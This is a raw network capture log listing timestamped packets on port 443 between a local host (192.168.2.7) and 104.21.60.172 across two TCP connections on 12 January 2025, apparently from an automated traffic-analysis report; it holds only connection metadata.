                                                              Jan 12, 2025 09:26:29.313003063 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.313060045 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.313159943 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.313159943 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.313159943 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.313167095 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.313512087 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.355206966 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.355268955 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.355318069 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.355331898 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.355353117 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.355484009 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.355534077 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.355565071 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.355571032 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.355621099 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.355621099 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.356427908 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.356477022 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.356525898 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.356530905 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.356561899 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.356683016 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.356941938 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.356990099 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.357023954 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.357028961 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.357070923 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.357155085 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.357157946 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.357182980 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.357218981 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.357254982 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.357264996 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.357299089 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.357345104 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.399487972 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.399533033 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.399602890 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.399619102 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.399646997 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.399682999 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.399744034 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.399782896 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.399846077 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.399853945 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.399878025 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.399902105 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.399930954 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.399960041 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.399960041 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.399966955 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.400051117 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.400051117 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.400058985 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.400356054 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.412339926 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.442650080 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.442696095 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.442806005 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.442852974 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.443137884 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.443137884 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.443137884 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.443137884 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.443151951 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.443336964 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.443372965 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.443417072 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.443454027 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.443460941 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.443490982 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.443645000 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.443773985 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.443814039 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.443855047 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.443860054 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.443897009 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.443908930 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.443911076 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.443934917 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.443970919 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.444019079 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.444019079 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.444030046 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.444036007 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.444674969 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.470032930 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.487162113 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.487216949 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.487277985 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.487294912 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.487335920 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.487335920 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.487373114 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.487427950 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.487468004 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.487555027 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.487601042 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.487601042 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.487607956 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.487620115 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.487639904 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.487683058 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.487690926 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.488439083 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.530004978 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.530050993 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.530111074 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.530138016 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.530155897 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.530210018 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.530317068 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.530361891 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.530374050 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.530390024 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.530419111 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.530437946 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.530767918 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.530808926 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.530832052 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.530838966 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.530867100 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.530877113 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.531289101 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.531347990 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.531356096 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.531371117 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.531398058 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.531408072 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.531464100 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.531513929 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.531523943 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.531533957 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.531565905 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.531583071 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.574547052 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.574598074 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.574655056 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.574675083 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.574692965 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.574712992 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.574765921 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.574807882 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.574832916 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.574839115 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.574867964 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.574889898 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.574911118 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.574951887 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.574978113 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.574981928 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.575009108 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.575032949 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.617439985 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.617486954 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.617541075 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.617557049 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.617583036 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.617733002 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.617744923 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.617758989 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.617790937 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.617806911 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.617814064 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.617829084 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.617861032 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.617883921 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.618149996 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.618190050 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.618222952 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.618227005 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.618256092 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.618266106 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.618711948 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.618755102 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.618791103 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.618794918 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.618858099 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.618858099 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.618886948 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.618931055 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.619030952 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.619082928 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.619097948 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.619107962 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.619142056 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.619151115 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.619154930 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.619280100 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:29.619285107 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.619668007 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.684191942 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:29.710695982 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:30.017348051 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:30.017368078 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:31.411250114 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:31.411290884 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:31.411354065 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:31.411736965 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:31.411747932 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:31.873280048 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:31.873347998 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:31.873717070 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:31.873723030 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:31.873877048 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:31.873881102 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.236601114 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.236666918 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.236680984 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.236721039 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.236741066 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.236790895 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.236829996 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.236875057 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.236911058 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.236995935 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.236999989 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.237040043 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.237102032 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.237274885 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.237309933 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.237313986 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.237339020 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.237353086 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.237369061 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.237411976 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.241136074 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.241203070 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.241219044 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.241267920 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.323035002 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.323107004 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.323174000 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.323220968 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.323287964 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.323347092 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.323380947 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.323540926 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.323560953 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.323566914 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.323582888 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.323606014 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.323616982 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.323672056 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.324006081 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.324059963 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.324090958 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.324155092 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.324160099 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.324206114 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.342334032 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.342406988 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.342423916 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.342463970 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.342509031 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.342556000 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.342593908 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.342638969 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.342679024 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.342719078 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.342758894 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.342977047 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.343029022 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.343035936 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.343075991 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.343080044 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.343116999 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.343125105 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.343159914 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.343173027 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.343218088 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.343272924 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.343400955 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.343816042 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.343873024 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.343916893 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.344014883 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.344018936 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.344069958 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.409813881 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.409893036 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.409930944 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.409977913 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.410007000 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.410064936 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.410134077 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.410178900 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.410213947 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.410259008 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.410645008 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.410706997 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.410734892 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.410809040 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.410814047 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.410881042 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.449378014 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.449450970 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.449873924 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.449927092 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.449960947 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.450026035 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.450530052 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.450583935 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.450615883 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.450670004 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.451385021 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.451443911 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.451467991 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.451523066 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.452256918 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.452321053 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.452347994 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.452508926 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.453105927 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.453172922 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.453201056 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.453257084 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.453279972 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.453336954 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.496582031 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.496665001 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.496876001 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.496931076 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.497070074 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.497131109 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.535990000 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.536061049 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.536107063 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.536166906 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.536206961 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.536261082 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.555541039 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.555613995 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.555881977 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.555944920 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.556202888 CET44349774104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:32.556266069 CET49774443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:32.556288958 CET44349774104.21.60.172192.168.2.7
